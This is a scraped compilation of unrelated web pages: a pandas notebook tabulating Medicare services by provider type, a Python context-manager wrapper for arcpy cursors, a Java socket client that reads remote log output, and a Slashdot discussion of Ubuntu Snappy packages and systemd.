data = pd.read_csv("MI-subset.csv.gz", compression="gzip") print(data.shape) print(data.columns)
(339456, 27) Index([u'npi', u'nppes_provider_last_org_name', u'nppes_provider_first_name', u'nppes_provider_mi', u'nppes_credentials', u'nppes_provider_gender', u'nppes_entity_code', u'nppes_provider_street1', u'nppes_provider_street2', u'nppes_provider_city', u'nppes_provider_zip', u'nppes_provider_state', u'nppes_provider_country', u'provider_type', u'medicare_participation_indicator', u'place_of_service', u'hcpcs_code', u'hcpcs_description', u'line_srvc_cnt', u'bene_unique_cnt', u'bene_day_srvc_cnt', u'average_Medicare_allowed_amt', u'stdev_Medicare_allowed_amt', u'average_submitted_chrg_amt', u'stdev_submitted_chrg_amt', u'average_Medicare_payment_amt', u'stdev_Medicare_payment_amt'], dtype='object')
Here is a simple way to produce a contingency table, however as discussed further below, it is not quite right for our purposes:
tab = pd.crosstab(data["hcpcs_description"], data["provider_type"]) print tab.shape tab.iloc[0:3,0:3]
(2754, 83)
The difficulty is that each row in the data set reflects multiple instances in which a provider provided services to a patient (the exact number is given in the
line_srvc_cnt variable). The contingency table above counts the number of rows of the data set with a given combination of provider type and service type. We want to weight these counts by the
line_srvc_cnt variable. This is done by the code in the next cell:
tab = data.groupby(["hcpcs_description", "provider_type"]).agg({"line_srvc_cnt": np.sum}) tab.head()
What we have now is a contingency table represented as a Series object with a hierarchical index. To convert it to an actual table, we use
unstack, which takes the second level of the hierarchical row index and moves it to become the column index.
tab = tab.unstack() tab.head()
5 rows × 83 columns
A minor issue is that
unstack creates a hierarchical column index with the name
line_srvc_cnt as the first level for all columns. Since
line_srvc_cnt is the only variable being aggregated here, we can drop this and convert the hierarchical column index to a regular column index.
tab.columns = tab.columns.get_level_values(1) tab.head()
5 rows × 83 columns
Since some service type by provider type combinations don't appear in the data, they are counted as
NaN in the data file. Here we replace them with zero.
tab = tab.replace(np.nan, 0) tab.head()
5 rows × 83 columns
Now we're ready to explore the relationship between provider types and service types. First, we look at the number of distinct services that are performed at least once by providers of a given type.
sum_ptype = (tab > 0).sum(0) print(len(sum_ptype)) print(sum_ptype.head())
83 provider_type Addiction Medicine 33 All Other Suppliers 6 Allergy/Immunology 56 Ambulance Service Supplier 14 Ambulatory Surgical Center 212 dtype: int64
sum_ptype.plot(kind='hist') plt.xlabel("Number of services provided", size=15) plt.ylabel("Number of provider types", size=15)
<matplotlib.text.Text at 0x7f70913a9fd0>
Here are the provider types that perform the greatest number of different types of services.
print(sum_ptype[sum_ptype > 400])
provider_type Clinical Laboratory 549 Diagnostic Radiology 503 Family Practice 529 General Practice 409 General Surgery 401 Internal Medicine 715 Physician Assistant 488 dtype: int64
Here are the provider types that perform the fewest distinct service types.
print(sum_ptype[sum_ptype < 10])
provider_type All Other Suppliers 6 Anesthesiologist Assistants 8 Chiropractic 1 Geriatric Psychiatry 4 Licensed Clinical Social Worker 9 Multispecialty Clinic/Group Practice 4 Psychologist (billing independently) 1 Public Health Welfare Agency 2 Registered Dietician/Nutrition Professional 6 Speech Language Pathologist 7 Unknown Supplier/Provider 7 dtype: int64
Two of the provider types only provide one service type, let's see what that is:
for svc in sum_ptype[sum_ptype == 1].index: tab1 = tab.loc[:, svc].copy() tab1.sort(ascending=False) print(svc) print(tab1[0:3]) print
Chiropractic hcpcs_description Chiropractic manipulation 1206635 bls 0 Dx bronchoscope/wash 0 Name: Chiropractic, dtype: float64 Psychologist (billing independently) hcpcs_description Neuropsych tst by psych/phys 291 bls 0 Dx bronchoscope/lavage 0 Name: Psychologist (billing independently), dtype: float64
Now we perform the same analysis on the service types. For each service type, we count the number of distinct provider types who provided that service at least once.
sum_stype = (tab > 0).sum(1) print(sum_stype.head()) sum_stype.plot(kind='hist') plt.xlabel("Number of providers that provide service", size=15) plt.ylabel("Number of services", size=15)
hcpcs_description 3d render w/o postprocess 7 3d rendering w/postprocess 9 5% dextrose/normal saline 3 5% dextrose/water 5 ALS1-emergency 1 dtype: int64
<matplotlib.text.Text at 0x7f70913a90d0>
Here are the service types that are provided by many different provider types:
print(sum_stype[sum_stype > 30])
hcpcs_description Admin influenza virus vac 38 Behav chng smoking 3-10 min 32 Dexamethasone sodium phos 31 Echo guide for biopsy 32 Electrocardiogram complete 35 Extracranial study 32 Hospital discharge day 38 Initial hospital care 52 Initial observation care 31 MD certification HHA patient 34 Nursing fac care subseq 31 Office/outpatient visit est 61 Office/outpatient visit new 61 Routine venipuncture 42 Subsequent hospital care 53 Ther/proph/diag inj sc/im 40 Vitamin b12 injection 31 dtype: int64
Here are the service types that are provided by only a single provider type:
print(sum_stype[sum_stype == 1])
hcpcs_description ALS1-emergency 1 AbobotulinumtoxinA 1 Abrasion lesion single 1 Acetone assay 1 Acoustic refl threshold tst 1 Adenovirus assay w/optic 1 Admin ecg contrast agent 1 Ag detect nos eia mult 1 Alpha-1-antitrypsin pheno 1 Alpha-1-antitrypsin total 1 Alpha-fetoprotein l3 1 Als 1 1 Alteplase recombinant 1 Amifostine 1 Amikacin sulfate injection 1 ... X-ray exam of body section 1 X-ray exam of eye sockets 1 X-ray exam of jaw joint 1 X-ray exam of mastoids 1 X-ray exam of shoulders 1 X-ray guide gu dilation 1 X-ray head for orthodontia 1 X-ray stress view 1 X-rays bone survey complete 1 X-rays bone survey limited 1 Xm archive tissue molec anal 1 Xpose endoprosth brachial 1 Xray endovasc thor ao repr 1 als 2 1 bls 1 Length: 1034, dtype: int64
For the service types that are provided by only one type of provider, we can tabulate which provider it is that provides the service, and also display the number of times that the service was provided.
ii = (sum_stype == 1) tab1 = tab.loc[ii, :] usv = tab1.apply(np.argmax, 1) usv = pd.DataFrame(usv) usv["Num"] = tab1.apply(np.max, 1) usv = usv.rename(columns={0: "Service"}) print(usv)
Service Num hcpcs_description ALS1-emergency Ambulance Service Supplier 209322 AbobotulinumtoxinA Neurology 13541 Abrasion lesion single Otolaryngology 20 Acetone assay Clinical Laboratory 18 Acoustic refl threshold tst Audiologist (billing independently) 73 Adenovirus assay w/optic Optometry 18 Admin ecg contrast agent Cardiology 93 Ag detect nos eia mult Clinical Laboratory 213 Alpha-1-antitrypsin pheno Clinical Laboratory 50 Alpha-1-antitrypsin total Clinical Laboratory 280 Alpha-fetoprotein l3 Clinical Laboratory 47 Als 1 Ambulance Service Supplier 14697 Alteplase recombinant Hematology/Oncology 149 Amifostine Medical Oncology 28 Amikacin sulfate injection Urology 93 Amines vaginal fluid qual Obstetrics/Gynecology 13 Amputate leg at thigh Vascular Surgery 48 Amputation toe & metatarsal Vascular Surgery 50 Analysis skeletal muscle Pathology 17 Analyz neurostim brain addon Neurology 18 Analyze spine infus pump Anesthesiology 33 Anesth abdominal wall surg Anesthesiology 15 Anesth cabg w/o pump Anesthesiology 14 Anesth dx knee arthroscopy CRNA 22 Anesth ear surgery Anesthesiology 79 Anesth genitalia surgery Anesthesiology 24 Anesth kidney transplant Anesthesiology 14 Anesth kidney/ureter surg Anesthesiology 148 Anesth knee joint procedure Anesthesiology 13 Anesth lower leg surgery Anesthesiology 52 ... ... ... Verteporfin injection Ophthalmology 15600 Vinorelbine tartrate inj Hematology/Oncology 963 Virus antibody nos Clinical Laboratory 95 Virus inoculation shell via Clinical Laboratory 198 Virus inoculation tissue Clinical Laboratory 61 Visual audiometry (vra) Audiologist (billing independently) 19 Vit for membrane dissect Ophthalmology 17 Wcd device interrogate Cardiology 222 Wedge resect of lung initial Cardiac Surgery 12 West nile virus ab igm Clinical Laboratory 54 West nile virus antibody Clinical Laboratory 46 Wheelchair mngment training Physical Therapist 361 Withdrawal of arterial blood Pulmonary Disease 452 Wound closure by adhesive Emergency Medicine 51 Wound prep addl 100 cm Plastic and Reconstructive Surgery 24 X-ray exam of body section Oral Surgery (dentists only) 280 X-ray exam of eye sockets Diagnostic Radiology 15 X-ray exam of jaw joint Oral Surgery (dentists only) 165 X-ray exam of mastoids Internal Medicine 77 X-ray exam of shoulders Orthopedic Surgery 411 X-ray guide gu dilation Diagnostic Radiology 19 X-ray head for orthodontia Oral Surgery (dentists only) 31 X-ray stress view Orthopedic Surgery 90 X-rays bone survey complete Diagnostic Radiology 531 X-rays bone survey limited Diagnostic Radiology 122 Xm archive tissue molec anal Pathology 513 Xpose endoprosth brachial Urology 13 Xray endovasc thor ao repr Interventional Radiology 12 als 2 Ambulance Service Supplier 4210 bls Ambulance Service Supplier 196370 [1034 rows x 2 columns]
Produce sorted lists of the 10 most common procedures in Michigan and in Florida.
Produce sorted lists of the 10 most common provider types in Michigan and in Florida.
Compute the difference between the number of times that each service was provided in Michigan and in Florida. Then compute the average of the number of times that each service was provided in Michigan and in Florida. Make a scatterplot of the difference against the average. If you think it is more helpful, do the analysis and plotting on the log scale. | http://nbviewer.jupyter.org/urls/umich.box.com/shared/static/xhqqcz70rwcorbz4mgqtay6x7qwycpv5.ipynb | CC-MAIN-2018-05 | en | refinedweb |
As a developer, think of a 'with' statement as a try/finally pattern
def opening(filename):
f = open(filename)
try:
yield f
finally:
f.close()
This can now be viewed as:
with f = opening(filename):
#...read data from f...
This makes writing code easier to understand, and you don't have to always remember to delete the object reference using the del().
How does this apply to the Cursor object? Well natively, the Cursor object does not support 'with' statement use. To extend the Cursor, more specifically SearchCursor, first create a class:
class custom_cursor(object):
"""
Extension class of cursor to enable use of
with statement
"""
def __init__(self, cursor):
self.cursor = cursor
def __enter__(self):
return self.cursor
def __exit__(self, type, value, traceback):
del self.cursor
Now you have an object called custom_cursor that has the minimum required class properties of __enter__() and __exit__(). Notice that __exit__() performs that annoying del() to remove the schema locks on our data.
How do you use this? It's not hard at all. In this example, the function searchCursor() takes a feature class or table and a where clause (expression) and returns the results as an array of Row objects.
def searchCursor(fc,expression=""):
"""
Returns a collections of rows as an array of Row Objects
:param fc: Feature Class or Table
:param expression: Where Clause Statement (Optional)
:rtype Rows: Array of Rows
"""
rows = []
with custom_cursor(arcpy.SearchCursor(fc,expression)) as cur:
for row in cur:
rows.append(row)
return rows
The del() is taken care of automatically, and when the process is completed the __exit__() is called launching the del().
I got this idea from Sean Gillies Blog | https://anothergisblog.blogspot.com/2011/06/advanced-extending-search-cursor-object.html | CC-MAIN-2018-05 | en | refinedweb |
In this article I share some source code for a Java class that reads and writes to a remote socket.
I’m not going to describe this much today, but I put the source code for this Java together from a number of other sources on the internet. In short, it uses a Java Socket to connect to a port on a remote server, sends a command (a string) to that server to be executed, and then reads the output from the command that is executed. As a result, I assume that all information sent is text (no binary data).
How this Java socket client works
In the real world, this Java code works as a socket client, and calls a Ruby script I’ve installed on several remote servers. That Ruby script runs under xinetd on the remote Linux systems, executes the commands I pass to it, and returns the results to me.
Although I’ve hard-coded a number of variables in this Java class, you can modify it very easily to work for your needs when it comes to open and connect to remote sockets.
Without any further introduction, here is the source code for my Java
SocketClient class:
import java.io.*; import java.net.*; public class SocketClient { Socket sock; String server = "ftpserver"; int port = 5550; String filename = "/foo/bar/application1.log"; String command = "tail -50 " + filename + "\n"; public static void main(String[] args) { new SocketClient(); } public SocketClient() { openSocket(); try { // write to socket BufferedWriter wr = new BufferedWriter(new OutputStreamWriter(sock.getOutputStream())); wr.write(command); wr.flush(); // read from socket BufferedReader rd = new BufferedReader(new InputStreamReader(sock.getInputStream())); String str; while ((str = rd.readLine()) != null) { System.out.println(str); } rd.close(); } catch (IOException e) { System.err.println(e); } } private void openSocket() { // open a socket and connect with a timeout limit try { InetAddress addr = InetAddress.getByName(server); SocketAddress sockaddr = new InetSocketAddress(addr, port); sock = new Socket(); // this method will block for the defined number of milliseconds int timeout = 2000; sock.connect(sockaddr, timeout); } catch (UnknownHostException e) { e.printStackTrace(); } catch (SocketTimeoutException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } } }
I’m sorry I don’t have time today to explain this code, but as a quick summary, if you were looking for some Java code that shows how to write to a Java socket, and also read from a Java socket, I hope this is helpful.
Add new comment | http://alvinalexander.com/blog/post/java/java-class-writes-reads-remote-socket | CC-MAIN-2017-17 | en | refinedweb |
Shuttleworth Says Snappy Won't Replace
.deb Linux Package Files In Ubuntu 15.10
232
darthcamaro writes: Mark Shuttleworth, BDFL of Ubuntu is clearing the air about how Ubuntu will make use of .deb packages even in an era where it is moving to its own Snappy ('snaps') format of rapid updates. Fundamentally it's a chicken and egg issue. From the serverwatch article: "'We build Snappy out of the built deb, so we can't build Snappy unless we first build the deb,' Shuttleworth said. Going forward, Shuttleworth said that Ubuntu users will still get access to an archive of .deb packages. That said, for users of a Snappy Ubuntu-based system, the apt-get command no longer applies. However, Shuttleworth explained that on a Snappy-based system there will be a container that contains all the deb packages. 'The nice thing about Snappy is that it's completely worry-free updates,' Shuttleworth said."
why bother? (Score:5, Funny)
The functionality will be built in to the next version of systemd.
Re:why bother? (Score:5, Informative)
why is this modded troll?
Lennart the great mastermind has announced it on his blog:... [0pointer.net]
systemd will be a distribution (Score:2)
sooner or later.
now why would someone let guys who want to do that make their bootup system? it will have it's own kernel soon enough too and it's going to be forking time again for all the distros
Re: (Score:3, Insightful)
Wow. Now i really am starting to get why people hate this guy.
Re:why bother? (Score:4, Interesting)
Maybe you should actually read what he wrote before jumping on the hate bandwagon. He's absolutely right that for many years and applications traditional package systems fall down. That's not to say they aren't important. They are and will continue to be. But they have their limitations when it comes to fast moving software like libre office on a nice stable slow moving distro like the lts releases of Linux distros.
As a matter of fact docker is really one attempt to solve this problem. Coreos is based on this idea. Chromeos also eschews packages entirely. Now snappy.
And as experimental distros like snappy try things, new utilities will have to be created to manage the images. This is what Poettering is talking about. In the meantime you're free to not use any of this. It's just a bunch of ideas, many of which happen to be really good, and natural extensions of the traditional package model. It's exciting stuff.
Re: (Score:2)
Sigh. That should have read, for many types of applications. Not many years. Google's swiping keyboard is pretty good but always makes a few mistakes.
Re:why bother? (Score:5, Insightful)
No they don't fall down. I've heard this claim and it's frankly not true (or rather, true in a very very limited set of cases).
For first party packages (distro provided) it's business as usual: ubuntu seems to have no trouble tracking the latest firefox builds and there's a fresh deb available via apt-get update && apt-get upgrade in a very timely manner. Likewise there's the fresh and still LO packegs available depending on whether you want stability with timely security updates or bleeding edge.
So, demonstrable, fast moving packages are not a problem.
What about third party ones?
Basically it's the same. Add a PPA for the third party repo and it just works. Now, if the third partd dev doesn't want to keep up to date with system libraries which may change, then they might choose to ship their own
.so files. That has the downside of not tracking security updates, but since linux package managers are the only system where arbitrary packages tend to get security updates to arbitrary libraries anyway all that does is lower the performance to that of every other OS on the planet.
And some programs do this: they provide a third party
.deb or PPA and dump files in /opt/foo completely isolated from the system files in/usr. That works very well too.
One of the ways that packaging falls down traditionally is for multiple versions of the same package installed concurrently. Part of this is because some programs themselves are not build for that (e.g. expecting files in
/etc), however most package can be persuaded otherwise and there are in fact package managers that solve this problem.
The other way is if a program needs a complex system relying on multiple non-default configured packages to be set up. At that point, it's often easier to ship an entire system image.
However, doing system images for everything seems a tad wasteful.
The other thing that is hapening is Zawinski's cascade of attention defecit teenagers. Yeah, I know packaging isn't perfect in general and deb is not perfect in a number of specific ways. But the people who want to dump everything and start afresh often seem to be quite unaware of teh state of the art. The results is that the new systems are usually better in some ways, but inevitably worse in a number of ways that the author didn't think of but have been hammered out and working well for 20 years in other systems.
It's sad because to someone who's around for a long time, software doesn't so much as advance as take an awful lot of steps sideways. You get big fat brand new shiny systems which just plain do a bad job of previously solved problems.
This seems to be the same: many of the reasons for doing away with packages are flat-out wrong which strongly implies that the people replacing packages don't really understand packages properly and are therefore likely to make a bunch of new mistakes which have previously been solved perfectly fine. So even if they solve some problems (I have no doubt they will), they'll also unsolve a bunch.
Re: (Score:2)
Zawinski's cascade of attention defecit teenagers.
What a great description.
Re: (Score:2)
It's exciting stuff.
Is there really a part in there you consider exciting?
Re: (Score:2)
It's their yummy new almond flavoured product.
Re: Kool-Aid (Score:2)
I actually what you're smelling are lolmonds, a newer relative of almonds.
Re: (Score:3, Funny)
Yes, how dare he develop software that people can use if they want to, the bastard.
Re: why bother? (Score:2)
Youre assuming that "convenient for distro developers" translates into "valuable for users".
More over you are ignoring that having it adopted as a dependency by things like gnome largely tied most distros hands. Dedicated non-gnome distros are the only ones that made a choice. Any distro that wants to ship gnome (an utterly unrelated product) did not choose systemd as there was no choice available.
Re: (Score:2)
Either quite a few people love him or many distros adopted systemd on a technical basis. Which option worries you more?
:)
Re: (Score:3, Insightful)
It's a troll because it's another pointless slam at systemd, which is entirely off-topic here.
And Pottering isn't announcing anything on his blog, he's discussing improvements he and other systemd developers think could be made to the way GNU/Linux software is distributed. That would make his comments slightly more on-topic here, given snappy is (apparently) a change to the way GNU/Linux software is distributed, but his comments don't directly relate to snappy and appear to be vague concepts.
Nor is the
Re: why bother? (Score:3, Funny)
Pid eins is an anagram of iPenisd - now I understand...
Re: why bother? (Score:2)
Please use Type=forking in your unit file to get the behaviour you are expecting. It's covered in the man page.
Re: (Score:3)
That's because the systemd manpage is about the main application. You want the systemd.service manpage.
Re: (Score:3)
You systemd haters are really hilarious.
Where else do you get to see somebody professing their love of the True Unix with Unix Philosophy, while repeatedly demonstrating ignorance of the very system they claim to love so much?
Allow me to impart a bit of education: some things have more than one manpage. For instance there's a manpage for both cron, and crontab, and Perl has a whole bunch of them. Any competent admin would know this and wouldn't be mystified by systemd having separate manpages for commandlin
Re: (Score:2)
Hah, I knew it. You have no ability to hold a technical discussion.
If there's somebody not needed here, it's people who are ignorant and proud of it. If you actually want to contribute something useful, start coding. You discredit your own cause by posting this nonsense.
Re: (Score:2)
So, what you're saying is: you must first elaborately troubleshoot system just to just freaking stderr so you can troubleshoot what you actually care about? Truly a step forward!
Re: (Score:3)
Actually it is a step forward.
In sysv land, this is the difference between letting a service fork by itself and using start-stop-daemon. If you take the later approach, start-stop-daemon will perform the daemonization task on behalf of the service. In such a case if it ever prints on stderr, it will be lost in the void, since it's no longer connected to any terminal. systemd actually will ensure it goes into the log.
Re: why bother? (Score:5, Informative)
What are you on about?
There's your stdout and stderr.
Re: (Score:2)
He doesn't know how to use journalctl and doesn't want to learn. He just wants to grep syslog the same way he has done for 30 years.
Re: (Score:3)
If something has worked fine for 30 years, why the fuck would you change it? Windows is the OS that pointlessly moves around all the administrative tools with every release; Linux is the OS that doesn't. That's not to say the OS can't change, but the new pieces must be backwards compatible with the basic system debugging techniques everyone knows. All it takes is software developers who don't actively hate their userbase and find joy in punishing them.
Re: why bother? (Score:4, Informative)
Actually no, it hasn't. sysv init has long been a pile of hacks on top of a pile of hacks. Ever tried to write a sysv service? It's really wonderful when a service refuses to come up because the pid file was left around for whatever reason, and some other program happens to be running under that pid.
For instance, the stderr thing this guy is complaining about was long a "feature" of sysv systems, where stderr could actually disappear into the void. Systemd actually makes things much better by ensuring stderr always gets saved.
As to why change logging, under systemd you can trivially ask for the messages for a particular service, or the messages from last boot, without having to figure out what to grep for, or having to setup syslogd beforehand to sort out your messages into separate files.
Re: (Score:2)
Systemd actually makes things much better by ensuring stderr always gets saved.
Your naive faith is cute. Sure, sysvinit is not wonderful. Regardless of the status of other init systems, SystemD is NOT the right answer. It is unreliable. It is taking over everything, which makes it a huge brittle obstacle that can be abused by those who control its underlying behavior. The guy writing it already has a terrible reputation for quality: Pulse Audio.
I could go on and on, but why. Some people are evangelists and there is no talking sense to them about the dangers of what is being proposed.
Re: (Score:2)
If something has worked fine for 30 years, why the fuck would you change it?
Good question. If something has worked fine for 30 years then no one would want to change it right? Certainly no one would be demanding the features? No one really wants easy commandline based syntax to extract exactly specific logs they are after.
Now back in the real world go ahead and install syslog-ng and dump all your crap into a text file like you're used to, and leave those of us who think that being a fucking regex guru should not be a pre-req to reading a log file alone.
Let me guess, you didn't even
Re: (Score:2)
That's not to say the OS can't change, but the new pieces must be backwards compatible
Sure. But the limitation here is not with systemd, but the fact that systemd has to communicate with syslog through a socket, and the socket has a limited buffer for storing queued messages. So if you need critical, timing-dependent log messages, you really need to use journalctl. If you refuse to use journalctl then you are shooting yourself in the foot and complaining that it hurts.
Re: (Score:2)
That's a stupid attitude to have in a field that moves as fast as computing. The internet didn't exist in anything resembling the current shape 30 years ago, just to give an example. You don't get to excuse ignorance of networking just because of that. I don't see how it's viable remaining a sysadmin without dealing with the fact that the hardware, software, and needs of the organization are constantly changing.
Nevertheless, all it takes is "ForwardToSyslog=yes" in journald.conf.
Re: (Score:2)
Well, if you understood anything about the project, you would know that rebuilding the init system and rebuilding the log system are two separate projects. There are independent rationales for each of them. You are free to disagree, of course, but they exist. And a counterargument of "it works for me" is less than useless in a discussion about whether the change is necessary. Given that there are a lot of people who do think a change is necessary, you should make a better attempt to understand why and make
Re: (Score:2)
You are all completely fucked, and clearly show your lack of maturity and competence.
What an odd statement.
Look AC, learn something about the way the linux kernel works, and then maybe you will be able to understand the problem. There can only be one logging daemon attached to
/dev/log. If it is journald it is journald, if it is syslog it is syslog. If you want both, one has to forward information to the other, and the amount and speed by which that forwarding can take place (via sockets) is limited by the kernel. So syslog missing messages that journald forwards, is an inherent limitation
Re: (Score:2)
Those desiring the change are the ones that need to explain why the change is needed/desirable in the first place.
They have, many times and in different places. If you didn't know that, maybe you should do some research.
I said that the arguments typically presented were weak and unreasonable.
So you do know that arguments and rationale have been made. Ok, how about a substantive counterargument then. Preferably one that actually addresses the arguments given and doesn't just dismiss them as "weak and unreasonable."
The ridiculously common command line that you wrote above fails on many/most distros that have chosen systemd as a default. These systems have no syslog at all.
Every distro that I know of (Red Hat, CentOS, Debian, Ubuntu, Arch) currently installs syslog alongside journald. If you don't have syslog installed, install it, and take it up wit
What happens with Launchpad PPAs? (Score:1, Interesting)
How? (Score:5, Insightful)
I don't think it was the PACKAGE that caused people to worry about an update.
Isn't that an issue with the code itself?
The great thing about
.deb packages was that the OFFICIAL ones underwent a lot of testing to try to catch problems BEFORE they were deployed. NOT because they were magical .deb packages.
Re: (Score:3)
Exactly - it is almost if they were trying to give a bad name to OS software.
There are very good reasons that Debs act like they do - and even M$ is now adopting the repository approach (but of course if the code isn't open, it can't prevent bad things from happening).
One could make the argument that all software should be it's own blob - no dependencies because hardrive are now huge - but having 6 different versions running reduces the chance that someone else will be facing the same bug as you are - and m
Re:How? (Score:5, Insightful)
I've seen software that depends on bugs to function
Back in the 90s, I had to intentionally reproduce Microsoft bugs in my Windows drivers, or various apps that had never been run with non-Microsoft drivers would fall over...
But, yeah, let's make Linux do things the Windows way, so you have sixteen copies of different versions of zlib.dll spread across your disk, all with different security holes. Because you know it makes sense!
Re:How? (Score:5, Interesting)
The great thing about
.deb packages was that the OFFICIAL ones underwent a lot of testing to try to catch problems BEFORE they were deployed. NOT because they were magical .deb packages.
I think they are still standing on Debian's shoulders here, and their Snap files are being automatically created from based on the
.debs. The main feature of a Snap file is it combines all the libraries in a single archive. All the dependencies, everything. It installs them locally, not for the whole system, kind of like an .app file on OSX.
If that seems like it would take a lot of disk space, Ubuntu is hoping disk deduplication will take care of that.
Re:How? (Score:4, Interesting)
All the dependencies, everything. It installs them locally, not for the whole system, kind of like an
.app file on OSX.
So.. they install things in Linux containers (or namespaces) and then call it "snappy"? So why not just link everything statically?
Anyway, I don't get it. You can do that already. but you still need to get those apps to communicate with outside world, which means leaky containers at best.
Furthermore, in case of heartbleed, it would mean EVERY single application that uses OpenSSL would have to get rebuilt instead of just getting fixed library and rebooting.
Re:How? (Score:4, Interesting)
I think there is definitely room in the Linux world for a self-contained App container. I don't think it's a good idea to make every package in your package management system self-contained, though.
Re: (Score:2)
Wheres the hate like systemD? (Score:2)
This also doesn't follow the Unix philosophy. Replaces a tool everyone is familiar with too. But I see no foaming at the mouths this time.
Re: (Score:3)
This also doesn't follow the Unix philosophy.
What part of the Unix philosophy doesn't it follow?
Replaces a tool everyone is familiar with too
It is a package manager, competing with plenty of other package managers out there. If you use this instead of Yum, it's not going to affect which GUI you use.
Re:Wheres the hate like systemD? (Score:5, Interesting)
As others have already pointer out, you are wrong for assuming this is like systemd, so I won't further beat that horse.
However I think it's foolish for Shuttleworth to go down this path. It's inevitable that systemd will start to require that it get's it's hooks into package management. Long story short, the way fixes are applies to systems is fundamentally broken. Whether it's because someone can't find a way to tell what needs to be restarted or can't impose a way to restart all services without down time or can't find a way to apply changes to all containers or whatever half thought out problem is the excuse, it's broken. And the only fix will be to bundle it into the logic of systemd. Amongst other things, a package format will need to be mandated because supporting multiple formats is stupid or hard or out-of-scope
... you name it.
No one has been able to oppse the systemd maintainers except the kernel developers when it comes users space interfaces. Canonical hasn't been able to stand its ground against these developers in the past. I doubt they will in the future either. Shuttleworth is creating another failure.
Re: (Score:2)
ROFLMAO.... [0pointer.net]
I am dying inside. LOL Read your words then read that link then read your words again. You just can't make this shit up.
Re: (Score:2)
pray tell what is the standard package manager for "the unix way"?
There never was one
hence, no problem
Re: (Score:2)
pray tell what is the standard package manager for "the unix way"?
It's called 'make'.
Re: (Score:2)
what is the standard package manager for "the unix way"?
tar
Re: (Score:2)
nah, there is also cpio, ar and shar
Scary Words (Score:3)
"completely worry-free updates"
Those are very scary words when ever someone utters them because they seem to fail to comprehend the fact that testing is not perfect. I have real work to do. When they F*sk my system with an update that fails and it loses my data or prevents me from working, just once, it can be a huge disaster for me. Multiply that times all the users. Not an issue for the developer. Completely worry-free updates. Not.
Re:Scary Words (Score:4, Informative)
When they F*sk my system with an update that fails and it loses my data or prevents me from working, just once, it can be a huge disaster for me.
But isn't that exactly what these Snappy - packages are meant to address? All the current data for the application is backed up, the update is applied, if something goes wrong the system rolls back to the state the package and its data was before the update was attempted. At least that's what it says on Ubuntu's website, I don't know anything else about this thing.
Re: (Score:2)
That's the theory. But when they say "Worry Free" it worries me.
Re: (Score:2)
I don't blame you, to be honest. I don't really trust the idea, either, at least not without trying it myself and seeing how hard it is to break it.
Famous Last Words (Score:5, Interesting)
"The nice thing about Snappy is that it's completely worry-free updates"
Any time anyone says something is "completely worry-free", that's your cue to worry. Ask me how I know.
Re:Famous Last Words (Score:5, Funny)
Ask me how I know.
How do you know?
Re: (Score:2)
Because he's old.
Stop being so Dice-friendly PC! It's because he's a guy.
Re: (Score:2)
Because he's old.
Stop being so Dice-friendly PC! It's because he's a guy.
No, no...it's because I'm a guy AND because I'm old. Sheesh.
It will be gone in a few releases (Score:2)
Like upstart.
we're only thrilled to hear, what poettering will introduce. Because redhat will adapt it and then everyone starts using it, because if its poetteringware, it's quasi standard, isn't it?
The Linux community is destroying itself. (Score:5, Insightful). Whatever small amount of convenience it may bring for the maintainers of Linux distros is more than offset by the many problems that systemd has caused the users of these distros. It doesn't matter if, say, the Debian maintainers' jobs are made easier if Debian itself suffers from reliability problems thanks to systemd that drive the most important Debian users over to FreeBSD.
But that's not the only example. We've seen the usability of Linux on desktops and workstations devastated by awful desktop environments like GNOME 3 and Unity. This mad rush to target "normal" users has been an utter disaster. No normal users have actually decided to use Linux due to these changes, but many long time Linux users have been forced to find alternatives.
If we go back 10 years, to 2005, I never would have expected Linux to be in such dire straits, and all due to problems that the Linux community has imposed on itself. It's really unbelievable how much harm the community has done to itself as of late.
Re:The Linux community is destroying itself. (Score:5, Interesting)
I'm not sure it's "the community" that's to blame as much as certain large entities in the community (*cough* Red Hat *cough*).
First, about systemd. Exactly what "problems" has it caused the users? On a normal distro, it runs in the background and should be transparent. sysvinit was ancient, and not even Solaris (the last true UNIX) uses it, it switched to SMF ages ago. All the anti-systemd hysteria I've seen has only been about vague possibilities, or whining about "the one true UNIX philosophy" (which again, apparently real UNIX doesn't even follow), etc. Whereas the systemd supporters can actually point to real, tangible benefits. Now admittedly, at home I'm a longtime user of Linux Mint which still runs on upstart for the moment, but I've been using CentOS 7 machines at work and I haven't run into any problems there (except for fucking Gnome3, more on that later). systemd seems to me to work just fine.
However, with Gnome3 and Unity, you're exactly right. The two most powerful and influential distros (Fedora/RHEL and Ubuntu) both changed to awful DEs, which certainly can't be attractive to new users who aren't looking for something that's a complete sea-change from the UIs they're used to. By all rights, KDE should be the default DE: it's reasonably fast, it's pretty bug-free at this point (compared to Gnome3, which is full of bugs in my personal experience with CentOS7), it's full-featured, it's highly configurable to do whatever you want, whether you want it to be more like Windows or like MacOS, and it's a familiar paradigm. Yes, the "semantic desktop" stuff is useless, but it's actually turned off by default on many distros now I believe, and if not, it's easy to disable and simply ignore--I do. So why Linux distros are pushing minimalistic DEs, I dunno. But I'm certainly not the only one who doesn't like them: there's a reason Mint has become so popular, and so many people have switched to Cinnamon and MATE.
Honestly, the big misstep that started most of this crap was the founding of GNOME back in the late 90s, due to the licensing issue with Qt. They should have abandoned Gnome when Qt finally was released under the GPL, then we wouldn't have these issues now.
Re: (Score:2)
Let me re-write that:
"KDE should be the default DE for everyone because I like it more"
and
"Software should have never been created, because having more choice in FOSS software is somehow bad for the Linux ecosystem."
Can you find the logic?
Re: (Score:3, Interesting)
"KDE should be the default DE for everyone because I like it more"
No, it should be the default because it's highly configurable. Any distro can easily make a preferred configuration instead of making an all-new DE. Obviously, a lot of people hated Gnome3, which is exactly why both MATE and Cinnamon were created. I think it would have been easier if they had put that effort into re-skinning KDE.
"Software should have never been created, because having more choice in FOSS software is somehow bad for the Lin
Re: (Score:2)
no good reason, as KDE has good defaults.
Re: (Score:2)
That's why you're an idiot: the defaults are fine, and there's nothing forcing you to configure it differently.
Re: (Score:2)
How will the defaults being what you want stop people playing with them?
The defaults aren't what I want; they're whatever the distro decides on (which are likely not very different from what the KDE publishes).
There's nothing stopping people from playing with them. How is that a bad thing? Holy shit, is everyone on Slashdot a Mac fan now? That probably isn't even fair to say, since even Macs have some configurability.
Re: (Score:2)
This is stupid.
First, KDE is not really competing against low-resource desktops like LXDE and XFCE.
Second, configurability is not a detriment. If you don't want to change the configuration, then DON'T. Leave it at the defaults. No one is forcing you to go through every configuration option.
